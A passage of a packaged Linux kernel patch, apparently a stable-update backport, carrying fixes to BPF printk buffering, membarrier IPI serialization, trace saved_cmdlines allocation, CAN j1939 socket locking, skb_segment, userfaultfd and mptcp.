++	err = bpf_bprintf_prepare(fmt, UINT_MAX, args, num_args, &data);
+ 	if (err < 0)
+ 		return err;
+ 
+-	err = bstr_printf(str, str_size, fmt, bin_args);
++	err = bstr_printf(str, str_size, fmt, data.bin_args);
+ 
+-	bpf_bprintf_cleanup();
++	bpf_bprintf_cleanup(&data);
+ 
+ 	return err + 1;
+ }
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 23b6d57b5eef2..1a29ac4db6eae 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -7448,6 +7448,7 @@ static int check_bpf_snprintf_call(struct bpf_verifier_env *env,
+ 	struct bpf_reg_state *fmt_reg = &regs[BPF_REG_3];
+ 	struct bpf_reg_state *data_len_reg = &regs[BPF_REG_5];
+ 	struct bpf_map *fmt_map = fmt_reg->map_ptr;
++	struct bpf_bprintf_data data = {};
+ 	int err, fmt_map_off, num_args;
+ 	u64 fmt_addr;
+ 	char *fmt;
+@@ -7472,7 +7473,7 @@ static int check_bpf_snprintf_call(struct bpf_verifier_env *env,
+ 	/* We are also guaranteed that fmt+fmt_map_off is NULL terminated, we
+ 	 * can focus on validating the format specifiers.
+ 	 */
+-	err = bpf_bprintf_prepare(fmt, UINT_MAX, NULL, NULL, num_args);
++	err = bpf_bprintf_prepare(fmt, UINT_MAX, NULL, num_args, &data);
+ 	if (err < 0)
+ 		verbose(env, "Invalid format string\n");
+ 
+diff --git a/kernel/sched/membarrier.c b/kernel/sched/membarrier.c
+index 0c5be7ebb1dca..08b16d20c85bb 100644
+--- a/kernel/sched/membarrier.c
++++ b/kernel/sched/membarrier.c
+@@ -161,6 +161,9 @@
+ 	| MEMBARRIER_PRIVATE_EXPEDITED_SYNC_CORE_BITMASK		\
+ 	| MEMBARRIER_PRIVATE_EXPEDITED_RSEQ_BITMASK)
+ 
++static DEFINE_MUTEX(membarrier_ipi_mutex);
++#define SERIALIZE_IPI() guard(mutex)(&membarrier_ipi_mutex)
++
+ static void ipi_mb(void *info)
+ {
+ 	smp_mb();	/* IPIs should be serializing but paranoid. */
+@@ -258,6 +261,7 @@ static int membarrier_global_expedited(void)
+ 	if (!zalloc_cpumask_var(&tmpmask, GFP_KERNEL))
+ 		return -ENOMEM;
+ 
++	SERIALIZE_IPI();
+ 	cpus_read_lock();
+ 	rcu_read_lock();
+ 	for_each_online_cpu(cpu) {
+@@ -346,6 +350,7 @@ static int membarrier_private_expedited(int flags, int cpu_id)
+ 	if (cpu_id < 0 && !zalloc_cpumask_var(&tmpmask, GFP_KERNEL))
+ 		return -ENOMEM;
+ 
++	SERIALIZE_IPI();
+ 	cpus_read_lock();
+ 
+ 	if (cpu_id >= 0) {
+@@ -459,6 +464,7 @@ static int sync_runqueues_membarrier_state(struct mm_struct *mm)
+ 	 * between threads which are users of @mm has its membarrier state
+ 	 * updated.
+ 	 */
++	SERIALIZE_IPI();
+ 	cpus_read_lock();
+ 	rcu_read_lock();
+ 	for_each_online_cpu(cpu) {
+diff --git a/kernel/time/hrtimer.c b/kernel/time/hrtimer.c
+index 8e0aff1d1ea4f..9bb88836c42e6 100644
+--- a/kernel/time/hrtimer.c
++++ b/kernel/time/hrtimer.c
+@@ -2266,7 +2266,7 @@ void __init hrtimers_init(void)
+ /**
+  * schedule_hrtimeout_range_clock - sleep until timeout
+  * @expires:	timeout value (ktime_t)
+- * @delta:	slack in expires timeout (ktime_t)
++ * @delta:	slack in expires timeout (ktime_t) for SCHED_OTHER tasks
+  * @mode:	timer mode
+  * @clock_id:	timer clock to be used
+  */
+@@ -2293,6 +2293,13 @@ schedule_hrtimeout_range_clock(ktime_t *expires, u64 delta,
+ 		return -EINTR;
+ 	}
+ 
++	/*
++	 * Override any slack passed by the user if under
++	 * rt contraints.
++	 */
++	if (rt_task(current))
++		delta = 0;
++
+ 	hrtimer_init_sleeper_on_stack(&t, clock_id, mode);
+ 	hrtimer_set_expires_range_ns(&t.timer, *expires, delta);
+ 	hrtimer_sleeper_start_expires(&t, mode);
+@@ -2312,7 +2319,7 @@ EXPORT_SYMBOL_GPL(schedule_hrtimeout_range_clock);
+ /**
+  * schedule_hrtimeout_range - sleep until timeout
+  * @expires:	timeout value (ktime_t)
+- * @delta:	slack in expires timeout (ktime_t)
++ * @delta:	slack in expires timeout (ktime_t) for SCHED_OTHER tasks
+  * @mode:	timer mode
+  *
+  * Make the current task sleep until the given expiry time has
+@@ -2320,7 +2327,8 @@ EXPORT_SYMBOL_GPL(schedule_hrtimeout_range_clock);
+  * the current task state has been set (see set_current_state()).
+  *
+  * The @delta argument gives the kernel the freedom to schedule the
+- * actual wakeup to a time that is both power and performance friendly.
++ * actual wakeup to a time that is both power and performance friendly
++ * for regular (non RT/DL) tasks.
+  * The kernel give the normal best effort behavior for "@expires+@delta",
+  * but may decide to fire the timer earlier, but no earlier than @expires.
+  *
+diff --git a/kernel/trace/bpf_trace.c b/kernel/trace/bpf_trace.c
+index f4a494a457c52..3fdde232eaa92 100644
+--- a/kernel/trace/bpf_trace.c
++++ b/kernel/trace/bpf_trace.c
+@@ -368,8 +368,6 @@ static const struct bpf_func_proto *bpf_get_probe_write_proto(void)
+ 	return &bpf_probe_write_user_proto;
+ }
+ 
+-static DEFINE_RAW_SPINLOCK(trace_printk_lock);
+-
+ #define MAX_TRACE_PRINTK_VARARGS	3
+ #define BPF_TRACE_PRINTK_SIZE		1024
+ 
+@@ -377,23 +375,22 @@ BPF_CALL_5(bpf_trace_printk, char *, fmt, u32, fmt_size, u64, arg1,
+ 	   u64, arg2, u64, arg3)
+ {
+ 	u64 args[MAX_TRACE_PRINTK_VARARGS] = { arg1, arg2, arg3 };
+-	u32 *bin_args;
+-	static char buf[BPF_TRACE_PRINTK_SIZE];
+-	unsigned long flags;
++	struct bpf_bprintf_data data = {
++		.get_bin_args	= true,
++		.get_buf	= true,
++	};
+ 	int ret;
+ 
+-	ret = bpf_bprintf_prepare(fmt, fmt_size, args, &bin_args,
+-				  MAX_TRACE_PRINTK_VARARGS);
++	ret = bpf_bprintf_prepare(fmt, fmt_size, args,
++				  MAX_TRACE_PRINTK_VARARGS, &data);
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	raw_spin_lock_irqsave(&trace_printk_lock, flags);
+-	ret = bstr_printf(buf, sizeof(buf), fmt, bin_args);
++	ret = bstr_printf(data.buf, MAX_BPRINTF_BUF, fmt, data.bin_args);
+ 
+-	trace_bpf_trace_printk(buf);
+-	raw_spin_unlock_irqrestore(&trace_printk_lock, flags);
++	trace_bpf_trace_printk(data.buf);
+ 
+-	bpf_bprintf_cleanup();
++	bpf_bprintf_cleanup(&data);
+ 
+ 	return ret;
+ }
+@@ -426,30 +423,29 @@ const struct bpf_func_proto *bpf_get_trace_printk_proto(void)
+ 	return &bpf_trace_printk_proto;
+ }
+ 
+-BPF_CALL_4(bpf_trace_vprintk, char *, fmt, u32, fmt_size, const void *, data,
++BPF_CALL_4(bpf_trace_vprintk, char *, fmt, u32, fmt_size, const void *, args,
+ 	   u32, data_len)
+ {
+-	static char buf[BPF_TRACE_PRINTK_SIZE];
+-	unsigned long flags;
++	struct bpf_bprintf_data data = {
++		.get_bin_args	= true,
++		.get_buf	= true,
++	};
+ 	int ret, num_args;
+-	u32 *bin_args;
+ 
+ 	if (data_len & 7 || data_len > MAX_BPRINTF_VARARGS * 8 ||
+-	    (data_len && !data))
++	    (data_len && !args))
+ 		return -EINVAL;
+ 	num_args = data_len / 8;
+ 
+-	ret = bpf_bprintf_prepare(fmt, fmt_size, data, &bin_args, num_args);
++	ret = bpf_bprintf_prepare(fmt, fmt_size, args, num_args, &data);
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	raw_spin_lock_irqsave(&trace_printk_lock, flags);
+-	ret = bstr_printf(buf, sizeof(buf), fmt, bin_args);
++	ret = bstr_printf(data.buf, MAX_BPRINTF_BUF, fmt, data.bin_args);
+ 
+-	trace_bpf_trace_printk(buf);
+-	raw_spin_unlock_irqrestore(&trace_printk_lock, flags);
++	trace_bpf_trace_printk(data.buf);
+ 
+-	bpf_bprintf_cleanup();
++	bpf_bprintf_cleanup(&data);
+ 
+ 	return ret;
+ }
+@@ -471,23 +467,25 @@ const struct bpf_func_proto *bpf_get_trace_vprintk_proto(void)
+ }
+ 
+ BPF_CALL_5(bpf_seq_printf, struct seq_file *, m, char *, fmt, u32, fmt_size,
+-	   const void *, data, u32, data_len)
++	   const void *, args, u32, data_len)
+ {
++	struct bpf_bprintf_data data = {
++		.get_bin_args	= true,
++	};
+ 	int err, num_args;
+-	u32 *bin_args;
+ 
+ 	if (data_len & 7 || data_len > MAX_BPRINTF_VARARGS * 8 ||
+-	    (data_len && !data))
++	    (data_len && !args))
+ 		return -EINVAL;
+ 	num_args = data_len / 8;
+ 
+-	err = bpf_bprintf_prepare(fmt, fmt_size, data, &bin_args, num_args);
++	err = bpf_bprintf_prepare(fmt, fmt_size, args, num_args, &data);
+ 	if (err < 0)
+ 		return err;
+ 
+-	seq_bprintf(m, fmt, bin_args);
++	seq_bprintf(m, fmt, data.bin_args);
+ 
+-	bpf_bprintf_cleanup();
++	bpf_bprintf_cleanup(&data);
+ 
+ 	return seq_has_overflowed(m) ? -EOVERFLOW : 0;
+ }
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index 1285e7fb597ee..e019a9278794f 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -1095,7 +1095,7 @@ __poll_t ring_buffer_poll_wait(struct trace_buffer *buffer, int cpu,
+ 		full = 0;
+ 	} else {
+ 		if (!cpumask_test_cpu(cpu, buffer->cpumask))
+-			return -EINVAL;
++			return EPOLLERR;
+ 
+ 		cpu_buffer = buffer->buffers[cpu];
+ 		work = &cpu_buffer->irq_work;
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index 2b3c4cd8382b3..f667d6bdddda5 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -40,6 +40,7 @@
+ #include <linux/ctype.h>
+ #include <linux/init.h>
+ #include <linux/panic_notifier.h>
++#include <linux/kmemleak.h>
+ #include <linux/poll.h>
+ #include <linux/nmi.h>
+ #include <linux/fs.h>
+@@ -2249,7 +2250,7 @@ struct saved_cmdlines_buffer {
+ 	unsigned *map_cmdline_to_pid;
+ 	unsigned cmdline_num;
+ 	int cmdline_idx;
+-	char *saved_cmdlines;
++	char saved_cmdlines[];
+ };
+ static struct saved_cmdlines_buffer *savedcmd;
+ 
+@@ -2263,47 +2264,60 @@ static inline void set_cmdline(int idx, const char *cmdline)
+ 	strncpy(get_saved_cmdlines(idx), cmdline, TASK_COMM_LEN);
+ }
+ 
+-static int allocate_cmdlines_buffer(unsigned int val,
+-				    struct saved_cmdlines_buffer *s)
++static void free_saved_cmdlines_buffer(struct saved_cmdlines_buffer *s)
+ {
++	int order = get_order(sizeof(*s) + s->cmdline_num * TASK_COMM_LEN);
++
++	kfree(s->map_cmdline_to_pid);
++	kmemleak_free(s);
++	free_pages((unsigned long)s, order);
++}
++
++static struct saved_cmdlines_buffer *allocate_cmdlines_buffer(unsigned int val)
++{
++	struct saved_cmdlines_buffer *s;
++	struct page *page;
++	int orig_size, size;
++	int order;
++
++	/* Figure out how much is needed to hold the given number of cmdlines */
++	orig_size = sizeof(*s) + val * TASK_COMM_LEN;
++	order = get_order(orig_size);
++	size = 1 << (order + PAGE_SHIFT);
++	page = alloc_pages(GFP_KERNEL, order);
++	if (!page)
++		return NULL;
++
++	s = page_address(page);
++	kmemleak_alloc(s, size, 1, GFP_KERNEL);
++	memset(s, 0, sizeof(*s));
++
++	/* Round up to actual allocation */
++	val = (size - sizeof(*s)) / TASK_COMM_LEN;
++	s->cmdline_num = val;
++
+ 	s->map_cmdline_to_pid = kmalloc_array(val,
+ 					      sizeof(*s->map_cmdline_to_pid),
+ 					      GFP_KERNEL);
+-	if (!s->map_cmdline_to_pid)
+-		return -ENOMEM;
+-
+-	s->saved_cmdlines = kmalloc_array(TASK_COMM_LEN, val, GFP_KERNEL);
+-	if (!s->saved_cmdlines) {
+-		kfree(s->map_cmdline_to_pid);
+-		return -ENOMEM;
++	if (!s->map_cmdline_to_pid) {
++		free_saved_cmdlines_buffer(s);
++		return NULL;
+ 	}
+ 
+ 	s->cmdline_idx = 0;
+-	s->cmdline_num = val;
+ 	memset(&s->map_pid_to_cmdline, NO_CMDLINE_MAP,
+ 	       sizeof(s->map_pid_to_cmdline));
+ 	memset(s->map_cmdline_to_pid, NO_CMDLINE_MAP,
+ 	       val * sizeof(*s->map_cmdline_to_pid));
+ 
+-	return 0;
++	return s;
+ }
+ 
+ static int trace_create_savedcmd(void)
+ {
+-	int ret;
+-
+-	savedcmd = kmalloc(sizeof(*savedcmd), GFP_KERNEL);
+-	if (!savedcmd)
+-		return -ENOMEM;
++	savedcmd = allocate_cmdlines_buffer(SAVED_CMDLINES_DEFAULT);
+ 
+-	ret = allocate_cmdlines_buffer(SAVED_CMDLINES_DEFAULT, savedcmd);
+-	if (ret < 0) {
+-		kfree(savedcmd);
+-		savedcmd = NULL;
+-		return -ENOMEM;
+-	}
+-
+-	return 0;
++	return savedcmd ? 0 : -ENOMEM;
+ }
+ 
+ int is_tracing_stopped(void)
+@@ -5972,26 +5986,14 @@ tracing_saved_cmdlines_size_read(struct file *filp, char __user *ubuf,
+ 	return simple_read_from_buffer(ubuf, cnt, ppos, buf, r);
+ }
+ 
+-static void free_saved_cmdlines_buffer(struct saved_cmdlines_buffer *s)
+-{
+-	kfree(s->saved_cmdlines);
+-	kfree(s->map_cmdline_to_pid);
+-	kfree(s);
+-}
+-
+ static int tracing_resize_saved_cmdlines(unsigned int val)
+ {
+ 	struct saved_cmdlines_buffer *s, *savedcmd_temp;
+ 
+-	s = kmalloc(sizeof(*s), GFP_KERNEL);
++	s = allocate_cmdlines_buffer(val);
+ 	if (!s)
+ 		return -ENOMEM;
+ 
+-	if (allocate_cmdlines_buffer(val, s) < 0) {
+-		kfree(s);
+-		return -ENOMEM;
+-	}
+-
+ 	preempt_disable();
+ 	arch_spin_lock(&trace_cmdline_lock);
+ 	savedcmd_temp = savedcmd;
+diff --git a/kernel/trace/trace_events_trigger.c b/kernel/trace/trace_events_trigger.c
+index 918730d749325..f941ce01ee351 100644
+--- a/kernel/trace/trace_events_trigger.c
++++ b/kernel/trace/trace_events_trigger.c
+@@ -1455,8 +1455,10 @@ register_snapshot_trigger(char *glob,
+ 			  struct event_trigger_data *data,
+ 			  struct trace_event_file *file)
+ {
+-	if (tracing_alloc_snapshot_instance(file->tr) != 0)
+-		return 0;
++	int ret = tracing_alloc_snapshot_instance(file->tr);
++
++	if (ret < 0)
++		return ret;
+ 
+ 	return register_trigger(glob, data, file);
+ }
+diff --git a/lib/mpi/ec.c b/lib/mpi/ec.c
+index 40f5908e57a4f..e16dca1e23d52 100644
+--- a/lib/mpi/ec.c
++++ b/lib/mpi/ec.c
+@@ -584,6 +584,9 @@ void mpi_ec_init(struct mpi_ec_ctx *ctx, enum gcry_mpi_ec_models model,
+ 	ctx->a = mpi_copy(a);
+ 	ctx->b = mpi_copy(b);
+ 
++	ctx->d = NULL;
++	ctx->t.two_inv_p = NULL;
++
+ 	ctx->t.p_barrett = use_barrett > 0 ? mpi_barrett_init(ctx->p, 0) : NULL;
+ 
+ 	mpi_ec_get_reset(ctx);
+diff --git a/mm/page-writeback.c b/mm/page-writeback.c
+index de5f69921b946..d3e9d12860b9f 100644
+--- a/mm/page-writeback.c
++++ b/mm/page-writeback.c
+@@ -1526,7 +1526,7 @@ static inline void wb_dirty_limits(struct dirty_throttle_control *dtc)
+ 	 */
+ 	dtc->wb_thresh = __wb_calc_thresh(dtc);
+ 	dtc->wb_bg_thresh = dtc->thresh ?
+-		div_u64((u64)dtc->wb_thresh * dtc->bg_thresh, dtc->thresh) : 0;
++		div64_u64(dtc->wb_thresh * dtc->bg_thresh, dtc->thresh) : 0;
+ 
+ 	/*
+ 	 * In order to avoid the stacked BDI deadlock we need
+diff --git a/mm/userfaultfd.c b/mm/userfaultfd.c
+index 650ab6cfd5f49..992a0a16846f7 100644
+--- a/mm/userfaultfd.c
++++ b/mm/userfaultfd.c
+@@ -327,6 +327,7 @@ static __always_inline ssize_t __mcopy_atomic_hugetlb(struct mm_struct *dst_mm,
+ 					      unsigned long dst_start,
+ 					      unsigned long src_start,
+ 					      unsigned long len,
++					      atomic_t *mmap_changing,
+ 					      enum mcopy_atomic_mode mode,
+ 					      bool wp_copy)
+ {
+@@ -445,6 +446,15 @@ static __always_inline ssize_t __mcopy_atomic_hugetlb(struct mm_struct *dst_mm,
+ 				goto out;
+ 			}
+ 			mmap_read_lock(dst_mm);
++			/*
++			 * If memory mappings are changing because of non-cooperative
++			 * operation (e.g. mremap) running in parallel, bail out and
++			 * request the user to retry later
++			 */
++			if (mmap_changing && atomic_read(mmap_changing)) {
++				err = -EAGAIN;
++				break;
++			}
+ 
+ 			dst_vma = NULL;
+ 			goto retry;
+@@ -480,6 +490,7 @@ extern ssize_t __mcopy_atomic_hugetlb(struct mm_struct *dst_mm,
+ 				      unsigned long dst_start,
+ 				      unsigned long src_start,
+ 				      unsigned long len,
++				      atomic_t *mmap_changing,
+ 				      enum mcopy_atomic_mode mode,
+ 				      bool wp_copy);
+ #endif /* CONFIG_HUGETLB_PAGE */
+@@ -601,8 +612,8 @@ static __always_inline ssize_t __mcopy_atomic(struct mm_struct *dst_mm,
+ 	 */
+ 	if (is_vm_hugetlb_page(dst_vma))
+ 		return  __mcopy_atomic_hugetlb(dst_mm, dst_vma, dst_start,
+-					       src_start, len, mcopy_mode,
+-					       wp_copy);
++					       src_start, len, mmap_changing,
++					       mcopy_mode, wp_copy);
+ 
+ 	if (!vma_is_anonymous(dst_vma) && !vma_is_shmem(dst_vma))
+ 		goto out_unlock;
+diff --git a/net/can/j1939/j1939-priv.h b/net/can/j1939/j1939-priv.h
+index 16af1a7f80f60..31a93cae5111b 100644
+--- a/net/can/j1939/j1939-priv.h
++++ b/net/can/j1939/j1939-priv.h
+@@ -86,7 +86,7 @@ struct j1939_priv {
+ 	unsigned int tp_max_packet_size;
+ 
+ 	/* lock for j1939_socks list */
+-	spinlock_t j1939_socks_lock;
++	rwlock_t j1939_socks_lock;
+ 	struct list_head j1939_socks;
+ 
+ 	struct kref rx_kref;
+@@ -301,6 +301,7 @@ struct j1939_sock {
+ 
+ 	int ifindex;
+ 	struct j1939_addr addr;
++	spinlock_t filters_lock;
+ 	struct j1939_filter *filters;
+ 	int nfilters;
+ 	pgn_t pgn_rx_filter;
+diff --git a/net/can/j1939/main.c b/net/can/j1939/main.c
+index ecff1c947d683..a6fb89fa62785 100644
+--- a/net/can/j1939/main.c
++++ b/net/can/j1939/main.c
+@@ -274,7 +274,7 @@ struct j1939_priv *j1939_netdev_start(struct net_device *ndev)
+ 		return ERR_PTR(-ENOMEM);
+ 
+ 	j1939_tp_init(priv);
+-	spin_lock_init(&priv->j1939_socks_lock);
++	rwlock_init(&priv->j1939_socks_lock);
+ 	INIT_LIST_HEAD(&priv->j1939_socks);
+ 
+ 	mutex_lock(&j1939_netdev_lock);
+diff --git a/net/can/j1939/socket.c b/net/can/j1939/socket.c
+index b0be23559243c..58909b36561a6 100644
+--- a/net/can/j1939/socket.c
++++ b/net/can/j1939/socket.c
+@@ -80,16 +80,16 @@ static void j1939_jsk_add(struct j1939_priv *priv, struct j1939_sock *jsk)
+ 	jsk->state |= J1939_SOCK_BOUND;
+ 	j1939_priv_get(priv);
+ 
+-	spin_lock_bh(&priv->j1939_socks_lock);
++	write_lock_bh(&priv->j1939_socks_lock);
+ 	list_add_tail(&jsk->list, &priv->j1939_socks);
+-	spin_unlock_bh(&priv->j1939_socks_lock);
++	write_unlock_bh(&priv->j1939_socks_lock);
+ }
+ 
+ static void j1939_jsk_del(struct j1939_priv *priv, struct j1939_sock *jsk)
+ {
+-	spin_lock_bh(&priv->j1939_socks_lock);
++	write_lock_bh(&priv->j1939_socks_lock);
+ 	list_del_init(&jsk->list);
+-	spin_unlock_bh(&priv->j1939_socks_lock);
++	write_unlock_bh(&priv->j1939_socks_lock);
+ 
+ 	j1939_priv_put(priv);
+ 	jsk->state &= ~J1939_SOCK_BOUND;
+@@ -262,12 +262,17 @@ static bool j1939_sk_match_dst(struct j1939_sock *jsk,
+ static bool j1939_sk_match_filter(struct j1939_sock *jsk,
+ 				  const struct j1939_sk_buff_cb *skcb)
+ {
+-	const struct j1939_filter *f = jsk->filters;
+-	int nfilter = jsk->nfilters;
++	const struct j1939_filter *f;
++	int nfilter;
++
++	spin_lock_bh(&jsk->filters_lock);
++
++	f = jsk->filters;
++	nfilter = jsk->nfilters;
+ 
+ 	if (!nfilter)
+ 		/* receive all when no filters are assigned */
+-		return true;
++		goto filter_match_found;
+ 
+ 	for (; nfilter; ++f, --nfilter) {
+ 		if ((skcb->addr.pgn & f->pgn_mask) != f->pgn)
+@@ -276,9 +281,15 @@ static bool j1939_sk_match_filter(struct j1939_sock *jsk,
+ 			continue;
+ 		if ((skcb->addr.src_name & f->name_mask) != f->name)
+ 			continue;
+-		return true;
++		goto filter_match_found;
+ 	}
++
++	spin_unlock_bh(&jsk->filters_lock);
+ 	return false;
++
++filter_match_found:
++	spin_unlock_bh(&jsk->filters_lock);
++	return true;
+ }
+ 
+ static bool j1939_sk_recv_match_one(struct j1939_sock *jsk,
+@@ -329,13 +340,13 @@ bool j1939_sk_recv_match(struct j1939_priv *priv, struct j1939_sk_buff_cb *skcb)
+ 	struct j1939_sock *jsk;
+ 	bool match = false;
+ 
+-	spin_lock_bh(&priv->j1939_socks_lock);
++	read_lock_bh(&priv->j1939_socks_lock);
+ 	list_for_each_entry(jsk, &priv->j1939_socks, list) {
+ 		match = j1939_sk_recv_match_one(jsk, skcb);
+ 		if (match)
+ 			break;
+ 	}
+-	spin_unlock_bh(&priv->j1939_socks_lock);
++	read_unlock_bh(&priv->j1939_socks_lock);
+ 
+ 	return match;
+ }
+@@ -344,11 +355,11 @@ void j1939_sk_recv(struct j1939_priv *priv, struct sk_buff *skb)
+ {
+ 	struct j1939_sock *jsk;
+ 
+-	spin_lock_bh(&priv->j1939_socks_lock);
++	read_lock_bh(&priv->j1939_socks_lock);
+ 	list_for_each_entry(jsk, &priv->j1939_socks, list) {
+ 		j1939_sk_recv_one(jsk, skb);
+ 	}
+-	spin_unlock_bh(&priv->j1939_socks_lock);
++	read_unlock_bh(&priv->j1939_socks_lock);
+ }
+ 
+ static void j1939_sk_sock_destruct(struct sock *sk)
+@@ -401,6 +412,7 @@ static int j1939_sk_init(struct sock *sk)
+ 	atomic_set(&jsk->skb_pending, 0);
+ 	spin_lock_init(&jsk->sk_session_queue_lock);
+ 	INIT_LIST_HEAD(&jsk->sk_session_queue);
++	spin_lock_init(&jsk->filters_lock);
+ 
+ 	/* j1939_sk_sock_destruct() depends on SOCK_RCU_FREE flag */
+ 	sock_set_flag(sk, SOCK_RCU_FREE);
+@@ -703,9 +715,11 @@ static int j1939_sk_setsockopt(struct socket *sock, int level, int optname,
+ 		}
+ 
+ 		lock_sock(&jsk->sk);
++		spin_lock_bh(&jsk->filters_lock);
+ 		ofilters = jsk->filters;
+ 		jsk->filters = filters;
+ 		jsk->nfilters = count;
++		spin_unlock_bh(&jsk->filters_lock);
+ 		release_sock(&jsk->sk);
+ 		kfree(ofilters);
+ 		return 0;
+@@ -1080,12 +1094,12 @@ void j1939_sk_errqueue(struct j1939_session *session,
+ 	}
+ 
+ 	/* spread RX notifications to all sockets subscribed to this session */
+-	spin_lock_bh(&priv->j1939_socks_lock);
++	read_lock_bh(&priv->j1939_socks_lock);
+ 	list_for_each_entry(jsk, &priv->j1939_socks, list) {
+ 		if (j1939_sk_recv_match_one(jsk, &session->skcb))
+ 			__j1939_sk_errqueue(session, &jsk->sk, type);
+ 	}
+-	spin_unlock_bh(&priv->j1939_socks_lock);
++	read_unlock_bh(&priv->j1939_socks_lock);
+ };
+ 
+ void j1939_sk_send_loop_abort(struct sock *sk, int err)
+@@ -1273,7 +1287,7 @@ void j1939_sk_netdev_event_netdown(struct j1939_priv *priv)
+ 	struct j1939_sock *jsk;
+ 	int error_code = ENETDOWN;
+ 
+-	spin_lock_bh(&priv->j1939_socks_lock);
++	read_lock_bh(&priv->j1939_socks_lock);
+ 	list_for_each_entry(jsk, &priv->j1939_socks, list) {
+ 		jsk->sk.sk_err = error_code;
+ 		if (!sock_flag(&jsk->sk, SOCK_DEAD))
+@@ -1281,7 +1295,7 @@ void j1939_sk_netdev_event_netdown(struct j1939_priv *priv)
+ 
+ 		j1939_sk_queue_drop_all(priv, jsk, error_code);
+ 	}
+-	spin_unlock_bh(&priv->j1939_socks_lock);
++	read_unlock_bh(&priv->j1939_socks_lock);
+ }
+ 
+ static int j1939_sk_no_ioctlcmd(struct socket *sock, unsigned int cmd,
+diff --git a/net/core/skbuff.c b/net/core/skbuff.c
+index 8a819d0a7bfb0..d4bd10f8723df 100644
+--- a/net/core/skbuff.c
++++ b/net/core/skbuff.c
+@@ -4213,8 +4213,9 @@ struct sk_buff *skb_segment(struct sk_buff *head_skb,
+ 		/* GSO partial only requires that we trim off any excess that
+ 		 * doesn't fit into an MSS sized block, so take care of that
+ 		 * now.
++		 * Cap len to not accidentally hit GSO_BY_FRAGS.
+ 		 */
+-		partial_segs = len / mss;
++		partial_segs = min(len, GSO_BY_FRAGS - 1U) / mss;
+ 		if (partial_segs > 1)
+ 			mss *= partial_segs;
+ 		else
+diff --git a/net/hsr/hsr_device.c b/net/hsr/hsr_device.c
+index b1e86a7265b32..83906d093f0ae 100644
+--- a/net/hsr/hsr_device.c
++++ b/net/hsr/hsr_device.c
+@@ -291,7 +291,7 @@ static void send_hsr_supervision_frame(struct hsr_port *master,
+ 
+ 	skb = hsr_init_skb(master);
+ 	if (!skb) {
+-		WARN_ONCE(1, "HSR: Could not send supervision frame\n");
++		netdev_warn_once(master->dev, "HSR: Could not send supervision frame\n");
+ 		return;
+ 	}
+ 
+@@ -338,7 +338,7 @@ static void send_prp_supervision_frame(struct hsr_port *master,
+ 
+ 	skb = hsr_init_skb(master);
+ 	if (!skb) {
+-		WARN_ONCE(1, "PRP: Could not send supervision frame\n");
++		netdev_warn_once(master->dev, "PRP: Could not send supervision frame\n");
+ 		return;
+ 	}
+ 
+diff --git a/net/mac80211/tx.c b/net/mac80211/tx.c
+index 2db103a56a28f..322a035f75929 100644
+--- a/net/mac80211/tx.c
++++ b/net/mac80211/tx.c
+@@ -5,7 +5,7 @@
+  * Copyright 2006-2007	Jiri Benc <jbenc@suse.cz>
+  * Copyright 2007	Johannes Berg <johannes@sipsolutions.net>
+  * Copyright 2013-2014  Intel Mobile Communications GmbH
+- * Copyright (C) 2018-2022 Intel Corporation
++ * Copyright (C) 2018-2024 Intel Corporation
+  *
+  * Transmit and frame generation functions.
+  */
+@@ -3838,6 +3838,7 @@ struct sk_buff *ieee80211_tx_dequeue(struct ieee80211_hw *hw,
+ 			goto begin;
+ 
+ 		skb = __skb_dequeue(&tx.skbs);
++		info = IEEE80211_SKB_CB(skb);
+ 
+ 		if (!skb_queue_empty(&tx.skbs)) {
+ 			spin_lock_bh(&fq->lock);
+@@ -3882,7 +3883,7 @@ struct sk_buff *ieee80211_tx_dequeue(struct ieee80211_hw *hw,
+ 	}
+ 
+ encap_out:
+-	IEEE80211_SKB_CB(skb)->control.vif = vif;
++	info->control.vif = vif;
+ 
+ 	if (tx.sta &&
+ 	    wiphy_ext_feature_isset(local->hw.wiphy, NL80211_EXT_FEATURE_AQL)) {
+diff --git a/net/mptcp/pm_userspace.c b/net/mptcp/pm_userspace.c
+index 38cbdc66d8bff..2e1e0d0e3ec60 100644
+--- a/net/mptcp/pm_userspace.c
++++ b/net/mptcp/pm_userspace.c
+@@ -132,10 +132,21 @@ int mptcp_userspace_pm_get_flags_and_ifindex_by_id(struct mptcp_sock *msk,
+ int mptcp_userspace_pm_get_local_id(struct mptcp_sock *msk,
+ 				    struct mptcp_addr_info *skc)
+ {
+-	struct mptcp_pm_addr_entry new_entry;
++	struct mptcp_pm_addr_entry *entry = NULL, *e, new_entry;
+ 	__be16 msk_sport =  ((struct inet_sock *)
+ 			     inet_sk((struct sock *)msk))->inet_sport;
+ 
++	spin_lock_bh(&msk->pm.lock);
++	list_for_each_entry(e, &msk->pm.userspace_pm_local_addr_list, list) {
++		if (mptcp_addresses_equal(&e->addr, skc, false)) {
++			entry = e;
++			break;
++		}
++	}
++	spin_unlock_bh(&msk->pm.lock);
++	if (entry)
++		return entry->addr.id;
++
+ 	memset(&new_entry, 0, sizeof(struct mptcp_pm_addr_entry));
+ 	new_entry.addr = *skc;
+ 	new_entry.addr.id = 0;
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index 76539d1004ebb..859b18cb8e4f6 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -1582,8 +1582,11 @@ static void mptcp_update_post_push(struct mptcp_sock *msk,
+ 
+ void mptcp_check_and_set_pending(struct sock *sk)
+ {
+-	if (mptcp_send_head(sk))
+-		mptcp_sk(sk)->push_pending |= BIT(MPTCP_PUSH_PENDING);
++	if (mptcp_send_head(sk)) {
++		mptcp_data_lock(sk);
++		mptcp_sk(sk)->cb_flags |= BIT(MPTCP_PUSH_PENDING);
++		mptcp_data_unlock(sk);
++	}
+ }
+ 
+ void __mptcp_push_pending(struct sock *sk, unsigned int flags)
+@@ -2336,9 +2339,6 @@ bool __mptcp_retransmit_pending_data(struct sock *sk)
+ 	if (__mptcp_check_fallback(mptcp_sk(sk)))
+ 		return false;
+ 
